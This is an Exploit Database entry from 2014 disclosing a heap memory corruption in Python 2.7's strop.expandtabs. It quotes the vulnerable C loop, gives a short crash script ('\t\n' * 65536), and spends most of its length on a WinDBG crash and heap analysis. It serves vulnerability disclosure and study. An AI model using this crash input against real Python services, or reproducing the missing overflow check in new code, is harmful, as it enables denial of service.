Python – Interpreter Heap Memory Corruption (PoC)

• Exploit Database
• 12 阅读

• 作者： Debasish Mandal
  日期： 2014-05-08
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/33251/

• # Title: Python Interpreter Heap Memory Corruption
  # Date: Sun, 30 Mar 2014 20:09:44 -0400
  # Vulnerability Discovered By : Unknown 
  # Proof of Concept : Debasish Mandal (https://twitter.com/debasishm89)
  # Software Link: https://www.python.org/
  # Version: All , Fix released (http://hg.python.org/cpython/rev/5dabc2d2f776)
  # Tested on: Microsoft Windows XP Professional SP2 EN (32bit)
  
  Recentl a new fix has been pushed to official python source code repository which fixes (http://hg.python.org/cpython/rev/5dabc2d2f776
  ) a memory corruption vulnerability in python interpreter's strop module. The vulnerability lies in expandtabs() functions. 
  This is due to a missing check in line 626,627 of /Modules/stropmodule.c.
  
  Vulnerable Code:
  
  https://github.com/pgbovine/Py2crazy/blob/master/Python-2.7.5/Modules/stropmodule.c#L627
  
  ------------------------------------------------------------------------------------------------------------
  for (p = string; p < e; p++) {
  if (*p == '\t') {
  j += tabsize - (j%tabsize);
  if (old_j > j) {
  PyErr_SetString(PyExc_OverflowError,
  "new string is too long");
  return NULL;
  }
  old_j = j;
  } else {
  j++;
  if (*p == '\n') {
  		// Missing check 
  i += j;
  j = 0;
  }
  }
  }
  ------------------------------------------------------------------------------------------------------------
  
  Patch Diff:
  http://hg.python.org/cpython/diff/5dabc2d2f776/Modules/stropmodule.c
  
  
  =================
  Proof of Concept:
  =================
  
  Running below code will crash the vulnerable python.exe process.
  
  import strop
  raw_input('Press Enter to BOOM!')
  a = '\t\n' * 65536
  strop.expandtabs(a, 65536)
  
  ============================
  Crash Analysis using WinDBG:
  ============================
  
  Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
  Copyright (c) Microsoft Corporation. All rights reserved.
  
  *** wait with pending attach
  Symbol search path is: SRV*E:\symbol*http://msdl.microsoft.com/download/symbols
  Executable search path is: 
  ModLoad: 1d000000 1d00a000 C:\Python27\python.exe
  ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
  ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
  ModLoad: 1e000000 1e227000 C:\WINDOWS\system32\python27.dll
  ModLoad: 77d40000 77dd0000 C:\WINDOWS\system32\USER32.dll
  ModLoad: 77f10000 77f56000 C:\WINDOWS\system32\GDI32.dll
  ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
  ModLoad: 77e70000 77f01000 C:\WINDOWS\system32\RPCRT4.dll
  ModLoad: 7c9c0000 7d1d4000 C:\WINDOWS\system32\SHELL32.dll
  ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
  ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
  ModLoad: 78520000 785c3000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\MSVCR90.dll
  ModLoad: 773d0000 774d2000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
  ModLoad: 5d090000 5d127000 C:\WINDOWS\system32\comctl32.dll
  (f0.320): Break instruction exception - code 80000003 (first chance)
  eax=7ffd6000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
  eip=7c901230 esp=023dffcc ebp=023dfff4 iopl=0 nv up ei pl zr na pe nc
  cs=001bss=0023ds=0023es=0023fs=0038gs=0000 efl=00000246
  ntdll!DbgBreakPoint:
  7c901230 ccint 3
  0:001> g
  (f0.1f4): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=20202020 ebx=0263bffe ecx=00003fff edx=00000001 esi=00010000 edi=025cf000
  eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc
  cs=001bss=0023ds=0023es=0023fs=0038gs=0000 efl=00010206
  MSVCR90!memset+0x5f:
  7855b37f f3abrep stos dword ptr es:[edi]
  
  We can see we have a write access violation at MSVCR90!memset+0x5f:
  
  Crash stack trace:
  
  0:000> kb
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\WINDOWS\system32\python27.dll - 
  ChildEBP RetAddrArgs to Child
  0021fce4 1e0483e2 025ceffd 00000020 00010000 MSVCR90!memset+0x5f
  WARNING: Stack unwind information not available. Following frames may be wrong.
  0021fd1c 1e08883b 00000000 022e7cd8 022eb5a8 python27!PyOS_AfterFork+0xc9f
  0021fd38 1e0bf781 022eb5a8 022e7cd8 00000000 python27!PyCFunction_Call+0x138
  0021fd60 1e0bcb94 1e0bd826 0021fdc4 01e280f8 python27!PyEval_GetFuncDesc+0x341
  0021fd64 1e0bd826 0021fdc4 01e280f8 02663ff0 python27!PyEval_EvalFrameEx+0x18e4
  0021fdd8 1e0be200 0021fe20 1e0be82e 02663eb8 python27!PyEval_EvalFrameEx+0x2576
  0021fde0 1e0be82e 02663eb8 00000000 0261e2c0 python27!PyEval_EvalCodeEx+0x50
  0021fe20 1e0bb295 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCodeEx+0x67e
  0021fe54 1e0e0d68 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCode+0x25
  0021fe70 1e0e0d36 0261e2c0 01de2ff3 01e1e6f0 python27!PyRun_FileExFlags+0x97
  0021fe9c 1e0e0329 785b7408 01de2ff3 00000101 python27!PyRun_FileExFlags+0x65
  0021fed8 1e0dff3e 785b7408 01de2ff3 00000001 python27!PyRun_SimpleFileExFlags+0x133
  0021fef8 1e02f5df 785b7408 01de2ff3 00000001 python27!PyRun_AnyFileExFlags+0x4c
  *** ERROR: Module load completed but symbols could not be loaded for C:\Python27\python.exe
  0021ff7c 1d001160 00000002 01de2fd0 01d9ef80 python27!Py_Main+0x805
  0021ffc0 7c816d4f 00090000 01fa0cda 7ffd6000 python+0x1160
  0021fff0 00000000 1d0012a8 00000000 78746341 kernel32!BaseProcessStart+0x23
  
  We crashed inside MSVCR90!memset
  
  After that we restart the app and set a break point at memset.
  
  0:001> bp MSVCR90!memset
  0:001> g
  Breakpoint 0 hit
  eax=00aada58 ebx=00000014 ecx=00000014 edx=00000a98 esi=1e1e0658 edi=00aada58
  eip=7855b320 esp=0021fbe8 ebp=0021fc30 iopl=0 nv up ei pl nz na po nc
  cs=001bss=0023ds=0023es=0023fs=0038gs=0000 efl=00000202
  MSVCR90!memset:
  7855b320 8b54240cmov edx,dword ptr [esp+0Ch] ss:0023:0021fbf4=00000014
  
  Partial Dis assembly of memset caller:
  
  .text:1E0483D0 sub esi, edx
  .text:1E0483D2 add [ebp+var_4], esi
  .text:1E0483D5 testesi, esi
  .text:1E0483D7 jle short loc_1E0483F8
  .text:1E0483D9 pushesi ; Size
  .text:1E0483DA push20h ; Val
  .text:1E0483DC pushedi ; Dst
  .text:1E0483DD callmemset
  .text:1E0483E2 add esp, 0Ch
  .text:1E0483E5 add edi, esi
  .text:1E0483E7 jmp short loc_1E0483F8
  .tex
  
  edi=00aada58 is pointing to destination where final string is getting copied. 
  
  0:000> dd esp
  0021fbe81e0978ad 00aada58 00000000 00000014
  0021fbf800a81310 1e0977a2 1e1e0658 1e075222
  0021fc081e1e0658 00000000 1e0977a2 1e0977dc
  0021fc181e1e0658 00a81310 00000000 1e1e0658
  0021fc281e0977a2 00aa8e40 0021fc9c 1e0650fe
  0021fc381e1e0658 00a81310 00000000 009aabf0
  0021fc4800a81310 1e06518c 1e1e0658 00a81310
  0021fc5800000000 009aabf0 00000000 1e0651d9
  
  
  0:000> !address 00aada58
  00a80000 : 00a80000 - 0004b000
  Type 00020000 MEM_PRIVATE
  Protect00000004 PAGE_READWRITE
  State00001000 MEM_COMMIT
  UsageRegionUsageHeap
  Handle 00970000
  
  
  It's confirmed that the memset() is actually trying write to heap. After few calls to memset the python.exe process will crash.
  
  0:000> g
  (7d8.44c): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=20202020 ebx=00adbf66 ecx=000037e1 edx=00000001 esi=00010000 edi=00b0e000
  eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc
  cs=001bss=0023ds=0023es=0023fs=0038gs=0000 efl=00010206
  MSVCR90!memset+0x5f:
  7855b37f f3abrep stos dword ptr es:[edi]
  
  =========================================
  Verify memory corruption using bang heap:
  =========================================
  
  0:000> !heap -s
  Heap Flags ReservCommitVirt FreeList UCRVirtLockFast 
  (k) (k)(k) (k) lengthblocks cont. heap 
  -----------------------------------------------------------------------------
  00240000 000000021024 32 328 1 100 L
  00340000 0000100264 24 24 13 1 100 L
  00350000 0000800064 12 12 10 1 100
  00930000 0000100264 16 162 1 100 L
  00950000 0000100264 16 162 2 100 L
  00970000 000010023136 1644 1656 33 3 200 L
  -----------------------------------------------------------------------------
  
  0x00240000is Default Process Heap. From the size of commited bytes we can say 0x00970000 handling a large number of data.
  
  0:000> !heap -a 00970000
  Index AddressNameDebugging options enabled
  6: 00970000 
  Segment at 00970000 to 00980000 (00010000 bytes committed)
  Segment at 00980000 to 00a80000 (00100000 bytes committed)
  Segment at 00a80000 to 00c80000 (0008b000 bytes committed)
  Flags:00001002
  ForceFlags: 00000000
  Granularity:8 bytes
  Segment Reserve:00400000
  Segment Commit: 00002000
  DeCommit Block Thres: 00000200
  DeCommit Total Thres: 00002000
  Total Free Size:000010df
  Max. Allocation Size: 7ffdefff
  Lock Variable at: 00970608
  Next TagIndex:0000
  Maximum TagIndex: 0000
  Tag Entries:00000000
  PsuedoTag Entries:00000000
  Virtual Alloc List: 00970050
  UCR FreeList:00970598
  FreeList Usage:84091158 00001001 00000000 80000000
  FreeList[ 00 ] at 00970178: 00ac5eb8 . 00a6f8d8
  00a6f8d0: 01008 . 00ad8 [00] - free
  00b0bf88: 10100 . 10100 [20] - free
  Unable to read nt!_HEAP_FREE_ENTRY structure at 20202018
  FreeList[ 03 ] at 00970190: 00a38ff0 . 00a57fe0
  00a57fd8: 00048 . 00018 [00] - free
  00a38fe8: 00048 . 00018 [00] - free
  FreeList[ 04 ] at 00970198: 009c1fe8 . 009c1fe8
  009c1fe0: 00188 . 00020 [00] - free
  FreeList[ 06 ] at 009701a8: 00acf128 . 00acf128
  00acf120: 00130 . 00030 [00] - free
  FreeList[ 08 ] at 009701b8: 00a58fb8 . 00a58fb8
  00a58fb0: 00010 . 00040 [00] - free
  FreeList[ 0c ] at 009701d8: 009cb980 . 009cb980
  009cb978: 00010 . 00060 [00] - free
  FreeList[ 10 ] at 009701f8: 009c7588 . 009c7588
  009c7580: 00178 . 00080 [00] - free
  FreeList[ 13 ] at 00970210: 00a2af50 . 00a2af50
  00a2af48: 000c8 . 00098 [00] - free
  FreeList[ 1a ] at 00970248: 00ac5a68 . 00ac5a68
  00ac5a60: 00170 . 000d0 [00] - free
  FreeList[ 1f ] at 00970270: 00a71990 . 00a71990
  00a71988: 00188 . 000f8 [00] - free
  FreeList[ 20 ] at 00970278: 00a78c78 . 00a78c78
  00a78c70: 00188 . 00100 [00] - free
  FreeList[ 2c ] at 009702d8: 009d8788 . 009d8788
  009d8780: 001d0 . 00160 [00] - free
  FreeList[ 7f ] at 00970570: 00a7a3c0 . 00a7a3c0
  00a7a3b8: 00220 . 003f8 [00] - free
  Segment00 at 00970640:
  Flags: 00000000
  Base:00970000
  First Entry: 00970680
  Last Entry:00980000
  Total Pages: 00000010
  Total UnCommit:00000000
  Largest UnCommit:00000000
  UnCommitted Ranges: (0)
  
  Heap entries for Segment00 in Heap 00970000
  00970000: 00000 . 00640 [01] - busy (640)
  00970640: 00640 . 00040 [01] - busy (40)
  00970680: 00040 . 01808 [01] - busy (1800)
  00971e88: 01808 . 00220 [01] - busy (214)
  009720a8: 00220 . 00808 [01] - busy (800)
  009728b0: 00808 . 001c8 [01] - busy (1c0)
  00972a78: 001c8 . 00188 [01] - busy (180)
  00972c00: 00188 . 00010 [01] - busy (4)
  00972c10: 00010 . 00010 [01] - busy (4)
  00972c20: 00010 . 00010 [01] - busy (4)
  00972c30: 00010 . 00018 [01] - busy (10)
  00972c48: 00018 . 00020 [01] - busy (18)
  00972c68: 00020 . 00018 [01] - busy (10)
  00972c80: 00018 . 00018 [01] - busy (10)
  00972c98: 00018 . 00028 [01] - busy (20)
  00972cc0: 00028 . 00018 [01] - busy (c)
  00972cd8: 00018 . 00010 [01] - busy (8)
  00972ce8: 00010 . 00228 [01] - busy (220)
  00972f10: 00228 . 00088 [01] - busy (7c)
  00972f98: 00088 . 00040 [01] - busy (34)
  00972fd8: 00040 . 00050 [01] - busy (43)
  00973028: 00050 . 00020 [01] - busy (13)
  00973048: 00020 . 00040 [01] - busy (31)
  00973088: 00040 . 00028 [01] - busy (1d)
  009730b0: 00028 . 00030 [01] - busy (24)
  009730e0: 00030 . 00020 [01] - busy (14)
  00973100: 00020 . 00020 [01] - busy (12)
  00973120: 00020 . 00018 [01] - busy (d)
  00973138: 00018 . 00040 [01] - busy (31)
  00973178: 00040 . 00028 [01] - busy (1e)
  009731a0: 00028 . 00020 [01] - busy (17)
  009731c0: 00020 . 00018 [01] - busy (e)
  009731d8: 00018 . 00098 [01] - busy (8a)
  00973270: 00098 . 00048 [01] - busy (39)
  009732b8: 00048 . 00028 [01] - busy (1b)
  009732e0: 00028 . 00050 [01] - busy (45)
  00973330: 00050 . 00020 [01] - busy (12)
  00973350: 00020 . 00020 [01] - busy (18)
  00973370: 00020 . 00028 [01] - busy (1e)
  00973398: 00028 . 00020 [01] - busy (13)
  009733b8: 00020 . 00020 [01] - busy (14)
  009733d8: 00020 . 00018 [01] - busy (f)
  009733f0: 00018 . 00020 [01] - busy (16)
  00973410: 00020 . 00030 [01] - busy (28)
  00973440: 00030 . 00030 [01] - busy (27)
  00973470: 00030 . 00028 [01] - busy (1b)
  00973498: 00028 . 00028 [01] - busy (19)
  009734c0: 00028 . 00040 [01] - busy (36)
  00973500: 00040 . 00020 [01] - busy (12)
  00973520: 00020 . 00808 [01] - busy (800)
  00973d28: 00808 . 00088 [01] - busy (80)
  00973db0: 00088 . 00088 [01] - busy (80)
  00973e38: 00088 . 00038 [01] - busy (30)
  00973e70: 00038 . 00030 [01] - busy (24)
  00973ea0: 00030 . 00018 [01] - busy (c)
  00973eb8: 00018 . 00060 [01] - busy (54)
  00973f18: 00060 . 00188 [01] - busy (180)
  009740a0: 00188 . 00608 [01] - busy (600)
  009746a8: 00608 . 00608 [01] - busy (600)
  00974cb0: 00608 . 00608 [01] - busy (600)
  009752b8: 00608 . 00208 [01] - busy (1fd)
  009754c0: 00208 . 00188 [01] - busy (180)
  00975648: 00188 . 00608 [01] - busy (600)
  00975c50: 00608 . 00608 [01] - busy (600)
  00976258: 00608 . 00228 [01] - busy (219)
  00976480: 00228 . 00608 [01] - busy (600)
  00976a88: 00608 . 00048 [01] - busy (3c)
  00976ad0: 00048 . 00150 [01] - busy (145)
  00976c20: 00150 . 00188 [01] - busy (180)
  00976da8: 00188 . 00110 [01] - busy (107)
  00976eb8: 00110 . 00188 [01] - busy (180)
  00977040: 00188 . 00608 [01] - busy (600)
  00977648: 00608 . 00190 [01] - busy (187)
  009777d8: 00190 . 00608 [01] - busy (600)
  00977de0: 00608 . 00608 [01] - busy (600)
  009783e8: 00608 . 00110 [01] - busy (103)
  009784f8: 00110 . 00220 [01] - busy (216)
  00978718: 00220 . 00188 [01] - busy (180)
  009788a0: 00188 . 00070 [01] - busy (64)
  00978910: 00070 . 00188 [01] - busy (180)
  00978a98: 00188 . 00608 [01] - busy (600)
  009790a0: 00608 . 00608 [01] - busy (600)
  009796a8: 00608 . 00148 [01] - busy (13b)
  009797f0: 00148 . 00188 [01] - busy (180)
  00979978: 00188 . 00608 [01] - busy (600)
  00979f80: 00608 . 00170 [01] - busy (162)
  0097a0f0: 00170 . 00608 [01] - busy (600)
  0097a6f8: 00608 . 00188 [01] - busy (180)
  0097a880: 00188 . 00608 [01] - busy (600)
  0097ae88: 00608 . 00608 [01] - busy (600)
  0097b490: 00608 . 001a8 [01] - busy (19c)
  0097b638: 001a8 . 00098 [01] - busy (8c)
  0097b6d0: 00098 . 00188 [01] - busy (180)
  0097b858: 00188 . 00608 [01] - busy (600)
  0097be60: 00608 . 00188 [01] - busy (180)
  0097bfe8: 00188 . 00188 [01] - busy (180)
  0097c170: 00188 . 00188 [01] - busy (180)
  0097c2f8: 00188 . 00608 [01] - busy (600)
  0097c900: 00608 . 00188 [01] - busy (180)
  0097ca88: 00188 . 00608 [01] - busy (600)
  0097d090: 00608 . 00188 [01] - busy (180)
  0097d218: 00188 . 000c0 [01] - busy (b8)
  0097d2d8: 000c0 . 00188 [01] - busy (180)
  0097d460: 00188 . 00188 [01] - busy (180)
  0097d5e8: 00188 . 00608 [01] - busy (600)
  0097dbf0: 00608 . 00188 [01] - busy (180)
  0097dd78: 00188 . 00608 [01] - busy (600)
  0097e380: 00608 . 003d8 [01] - busy (3ce)
  0097e758: 003d8 . 003e8 [01] - busy (3dc)
  0097eb40: 003e8 . 003e8 [01] - busy (3dc)
  0097ef28: 003e8 . 003e8 [01] - busy (3dc)
  0097f310: 003e8 . 003e8 [01] - busy (3dc)
  0097f6f8: 003e8 . 00608 [01] - busy (600)
  0097fd00: 00608 . 000f8 [01] - busy (f0)
  0097fdf8: 000f8 . 00150 [01] - busy (148)
  0097ff48: 00150 . 00038 [01] - busy (30)
  0097ff80: 00038 . 00080 [11] - busy (78)
  Segment01 at 00980000:
  Flags: 00000000
  Base:00980000
  First Entry: 00980040
  Last Entry:00a80000
  Total Pages: 00000100
  Total UnCommit:00000000
  Largest UnCommit:00000000
  UnCommitted Ranges: (0)
  
  Heap entries for Segment01 in Heap 00970000
  00980000: 00000 . 00040 [01] - busy (40)
  00980040: 00040 . 40008 [01] - busy (40000)
  009c0048: 40008 . 00608 [01] - busy (600)
  009c0650: 00608 . 01808 [01] - busy (1800)
  009c1e58: 01808 . 00188 [01] - busy (180)
  009c1fe0: 00188 . 00020 [00]
  009c2000: 00020 . 00608 [01] - busy (600)
  009c2608: 00608 . 00608 [01] - busy (600)
  009c2c10: 00608 . 00608 [01] - busy (600)
  009c3218: 00608 . 01808 [01] - busy (1800)
  009c4a20: 01808 . 00160 [01] - busy (158)
  009c4b80: 00160 . 00188 [01] - busy (180)
  009c4d08: 00188 . 00160 [01] - busy (158)
  009c4e68: 00160 . 00188 [01] - busy (180)
  009c4ff0: 00188 . 00608 [01] - busy (600)
  009c55f8: 00608 . 01808 [01] - busy (1800)
  009c6e00: 01808 . 00608 [01] - busy (600)
  009c7408: 00608 . 00178 [01] - busy (16c)
  009c7580: 00178 . 00080 [00]
  009c7600: 00080 . 002e8 [01] - busy (2df)
  009c78e8: 002e8 . 00198 [01] - busy (18a)
  009c7a80: 00198 . 00220 [01] - busy (214)
  009c7ca0: 00220 . 00200 [01] - busy (1f8)
  009c7ea0: 00200 . 001d0 [01] - busy (1c1)
  009c8070: 001d0 . 00260 [01] - busy (257)
  009c82d0: 00260 . 001d8 [01] - busy (1cb)
  009c84a8: 001d8 . 00168 [01] - busy (160)
  009c8610: 00168 . 00188 [01] - busy (180)
  009c8798: 00188 . 001b0 [01] - busy (1a8)
  009c8948: 001b0 . 001a8 [01] - busy (19d)
  009c8af0: 001a8 . 000c8 [01] - busy (c0)
  009c8bb8: 000c8 . 00050 [01] - busy (48)
  009c8c08: 00050 . 00010 [01] - busy (4)
  009c8c18: 00010 . 00f88 [01] - busy (f7f)
  009c9ba0: 00f88 . 00090 [01] - busy (82)
  009c9c30: 00090 . 003f0 [01] - busy (3e8)
  009ca020: 003f0 . 00128 [01] - busy (120)
  009ca148: 00128 . 00120 [01] - busy (114)
  009ca268: 00120 . 00608 [01] - busy (600)
  009ca870: 00608 . 00148 [01] - busy (140)
  009ca9b8: 00148 . 00608 [01] - busy (600)
  009cafc0: 00608 . 000d0 [01] - busy (c8)
  009cb090: 000d0 . 00608 [01] - busy (600)
  009cb698: 00608 . 00250 [01] - busy (247)
  009cb8e8: 00250 . 00018 [01] - busy (10)
  009cb900: 00018 . 00018 [01] - busy (10)
  009cb918: 00018 . 00020 [01] - busy (18)
  009cb938: 00020 . 00018 [01] - busy (10)
  009cb950: 00018 . 00018 [01] - busy (10)
  009cb968: 00018 . 00010 [01] - busy (2)
  009cb978: 00010 . 00060 [00]
  009cb9d8: 00060 . 00608 [01] - busy (600)
  009cbfe0: 00608 . 00048 [01] - busy (3c)
  009cc028: 00048 . 00020 [01] - busy (18)
  009cc048: 00020 . 00018 [01] - busy (10)
  009cc060: 00018 . 00018 [01] - busy (10)
  009cc078: 00018 . 00188 [01] - busy (180)
  009cc200: 00188 . 00030 [01] - busy (24)
  009cc230: 00030 . 00018 [01] - busy (10)
  009cc248: 00018 . 00188 [01] - busy (180)
  009cc3d0: 00188 . 00030 [01] - busy (22)
  009cc400: 00030 . 00018 [01] - busy (10)
  009cc418: 00018 . 00028 [01] - busy (20)
  009cc440: 00028 . 00018 [01] - busy (10)
  009cc458: 00018 . 00188 [01] - busy (180)
  009cc5e0: 00188 . 00018 [01] - busy (10)
  009cc5f8: 00018 . 00018 [01] - busy (10)
  009cc610: 00018 . 00048 [01] - busy (40)
  009cc658: 00048 . 00018 [01] - busy (10)
  009cc670: 00018 . 00188 [01] - busy (180)
  009cc7f8: 00188 . 00018 [01] - busy (10)
  009cc810: 00018 . 00188 [01] - busy (180)
  009cc998: 00188 . 00018 [01] - busy (10)
  009cc9b0: 00018 . 00188 [01] - busy (180)
  009ccb38: 00188 . 00018 [01] - busy (c)
  009ccb50: 00018 . 00018 [01] - busy (10)
  009ccb68: 00018 . 00048 [01] - busy (40)
  009ccbb0: 00048 . 00130 [01] - busy (127)
  009ccce0: 00130 . 00188 [01] - busy (180)
  009cce68: 00188 . 00018 [01] - busy (10)
  009cce80: 00018 . 00188 [01] - busy (180)
  009cd008: 00188 . 00608 [01] - busy (600)
  009cd610: 00608 . 00608 [01] - busy (600)
  009cdc18: 00608 . 01808 [01] - busy (1800)
  009cf420: 01808 . 001f8 [01] - busy (1ef)
  009cf618: 001f8 . 00270 [01] - busy (264)
  009cf888: 00270 . 001e0 [01] - busy (1d8)
  009cfa68: 001e0 . 00188 [01] - busy (180)
  009cfbf0: 00188 . 000c8 [01] - busy (c0)
  009cfcb8: 000c8 . 00188 [01] - busy (180)
  009cfe40: 00188 . 005d8 [01] - busy (5ca)
  009d0418: 005d8 . 00080 [01] - busy (78)
  009d0498: 00080 . 00308 [01] - busy (300)
  009d07a0: 00308 . 00188 [01] - busy (180)
  009d0928: 00188 . 00018 [01] - busy (10)
  009d0940: 00018 . 00188 [01] - busy (180)
  009d0ac8: 00188 . 00020 [01] - busy (18)
  009d0ae8: 00020 . 00c10 [01] - busy (c00)
  009d16f8: 00c10 . 003e8 [01] - busy (3dc)
  009d1ae0: 003e8 . 00010 [01] - busy (4)
  009d1af0: 00010 . 00260 [01] - busy (255)
  009d1d50: 00260 . 000f0 [01] - busy (e8)
  009d1e40: 000f0 . 00158 [01] - busy (14f)
  009d1f98: 00158 . 00a60 [01] - busy (a51)
  009d29f8: 00a60 . 00168 [01] - busy (160)
  009d2b60: 00168 . 00178 [01] - busy (16f)
  009d2cd8: 00178 . 00258 [01] - busy (24d)
  009d2f30: 00258 . 00138 [01] - busy (12b)
  009d3068: 00138 . 00158 [01] - busy (150)
  009d31c0: 00158 . 00158 [01] - busy (14a)
  009d3318: 00158 . 00180 [01] - busy (178)
  009d3498: 00180 . 00138 [01] - busy (12b)
  009d35d0: 00138 . 00158 [01] - busy (14f)
  009d3728: 00158 . 00178 [01] - busy (16c)
  009d38a0: 00178 . 00180 [01] - busy (178)
  009d3a20: 00180 . 001f0 [01] - busy (1e4)
  009d3c10: 001f0 . 002c0 [01] - busy (2b4)
  009d3ed0: 002c0 . 00200 [01] - busy (1f8)
  009d40d0: 00200 . 001f8 [01] - busy (1f0)
  009d42c8: 001f8 . 01808 [01] - busy (1800)
  009d5ad0: 01808 . 00608 [01] - busy (600)
  009d60d8: 00608 . 00608 [01] - busy (600)
  009d66e0: 00608 . 000e8 [01] - busy (dc)
  009d67c8: 000e8 . 00018 [01] - busy (c)
  009d67e0: 00018 . 00030 [01] - busy (28)
  009d6810: 00030 . 00198 [01] - busy (18e)
  009d69a8: 00198 . 00970 [01] - busy (963)
  009d7318: 00970 . 000c0 [01] - busy (b8)
  009d73d8: 000c0 . 001d8 [01] - busy (1cf)
  009d75b0: 001d8 . 00128 [01] - busy (11d)
  009d76d8: 00128 . 00110 [01] - busy (104)
  009d77e8: 00110 . 00168 [01] - busy (15a)
  009d7950: 00168 . 00150 [01] - busy (141)
  009d7aa0: 00150 . 001b0 [01] - busy (1a4)
  009d7c50: 001b0 . 00198 [01] - busy (18d)
  009d7de8: 00198 . 00148 [01] - busy (140)
  009d7f30: 00148 . 003b0 [01] - busy (3a4)
  009d82e0: 003b0 . 00110 [01] - busy (105)
  
  009d83f0: 00110 . 001c0 [01] - busy (1b1)
  009d85b0: 001c0 . 001d0 [01] - busy (1c7)
  009d8780: 001d0 . 00160 [00]
  009d88e0: 00160 . 00018 [01] - busy (c)
  009d88f8: 00018 . 00188 [01] - busy (180)
  009d8a80: 00188 . 00020 [01] - busy (18)
  009d8aa0: 00020 . 01808 [01] - busy (1800)
  009da2a8: 01808 . 00608 [01] - busy (600)
  009da8b0: 00608 . 001a8 [01] - busy (19a)
  009daa58: 001a8 . 00608 [01] - busy (600)
  009db060: 00608 . 00140 [01] - busy (133)
  009db1a0: 00140 . 00c08 [01] - busy (c00)
  009dbda8: 00c08 . 00158 [01] - busy (14d)
  009dbf00: 00158 . 00160 [01] - busy (155)
  009dc060: 00160 . 00368 [01] - busy (35e)
  009dc3c8: 00368 . 00140 [01] - busy (132)
  009dc508: 00140 . 01808 [01] - busy (1800)
  009ddd10: 01808 . 00170 [01] - busy (168)
  009dde80: 00170 . 00130 [01] - busy (124)
  009ddfb0: 00130 . 00018 [01] - busy (10)
  009ddfc8: 00018 . 00018 [01] - busy (4)
  009ddfe0: 00018 . 00188 [01] - busy (180)
  009de168: 00188 . 00188 [01] - busy (180)
  009de2f0: 00188 . 00188 [01] - busy (180)
  009de478: 00188 . 00608 [01] - busy (600)
  009dea80: 00608 . 00158 [01] - busy (150)
  009debd8: 00158 . 00020 [01] - busy (18)
  009debf8: 00020 . 00020 [01] - busy (14)
  009dec18: 00020 . 00018 [01] - busy (10)
  009dec30: 00018 . 00020 [01] - busy (18)
  009dec50: 00020 . 00018 [01] - busy (10)
  009dec68: 00018 . 00018 [01] - busy (10)
  009dec80: 00018 . 00018 [01] - busy (10)
  009dec98: 00018 . 00010 [01] - busy (4)
  009deca8: 00010 . 00070 [01] - busy (64)
  009ded18: 00070 . 00198 [01] - busy (18c)
  009deeb0: 00198 . 00020 [01] - busy (18)
  009deed0: 00020 . 000f0 [01] - busy (e8)
  009defc0: 000f0 . 00210 [01] - busy (202)
  009df1d0: 00210 . 00218 [01] - busy (20e)
  009df3e8: 00218 . 00238 [01] - busy (229)
  009df620: 00238 . 000d0 [01] - busy (c0)
  009df6f0: 000d0 . 004a0 [01] - busy (498)
  009dfb90: 004a0 . 00098 [01] - busy (90)
  009dfc28: 00098 . 00120 [01] - busy (117)
  009dfd48: 00120 . 001d0 [01] - busy (1c1)
  009dff18: 001d0 . 40008 [01] - busy (40000)
  00a1ff20: 40008 . 00330 [01] - busy (324)
  00a20250: 00330 . 00188 [01] - busy (180)
  00a203d8: 00188 . 00150 [01] - busy (145)
  00a20528: 00150 . 00190 [01] - busy (188)
  00a206b8: 00190 . 00188 [01] - busy (180)
  00a20840: 00188 . 00218 [01] - busy (210)
  00a20a58: 00218 . 00188 [01] - busy (180)
  00a20be0: 00188 . 00188 [01] - busy (180)
  00a20d68: 00188 . 00040 [01] - busy (38)
  00a20da8: 00040 . 00120 [01] - busy (117)
  00a20ec8: 00120 . 00020 [01] - busy (18)
  00a20ee8: 00020 . 000e8 [01] - busy (dc)
  00a20fd0: 000e8 . 00608 [01] - busy (600)
  00a215d8: 00608 . 00178 [01] - busy (170)
  00a21750: 00178 . 00270 [01] - busy (268)
  00a219c0: 00270 . 00078 [01] - busy (64)
  00a21a38: 00078 . 00190 [01] - busy (184)
  00a21bc8: 00190 . 00608 [01] - busy (600)
  00a221d0: 00608 . 00188 [01] - busy (180)
  00a22358: 00188 . 00188 [01] - busy (180)
  00a224e0: 00188 . 001e0 [01] - busy (1d8)
  00a226c0: 001e0 . 00188 [01] - busy (180)
  00a22848: 00188 . 00120 [01] - busy (117)
  00a22968: 00120 . 00028 [01] - busy (20)
  00a22990: 00028 . 00018 [01] - busy (c)
  00a229a8: 00018 . 00188 [01] - busy (180)
  00a22b30: 00188 . 00018 [01] - busy (10)
  00a22b48: 00018 . 00020 [01] - busy (14)
  00a22b68: 00020 . 00020 [01] - busy (14)
  00a22b88: 00020 . 00048 [01] - busy (40)
  00a22bd0: 00048 . 00288 [01] - busy (27b)
  00a22e58: 00288 . 00250 [01] - busy (244)
  00a230a8: 00250 . 00148 [01] - busy (140)
  00a231f0: 00148 . 001e0 [01] - busy (1d8)
  00a233d0: 001e0 . 00608 [01] - busy (600)
  00a239d8: 00608 . 00170 [01] - busy (164)
  00a23b48: 00170 . 001e0 [01] - busy (1d8)
  00a23d28: 001e0 . 00070 [01] - busy (62)
  00a23d98: 00070 . 00148 [01] - busy (13a)
  00a23ee0: 00148 . 000f0 [01] - busy (e8)
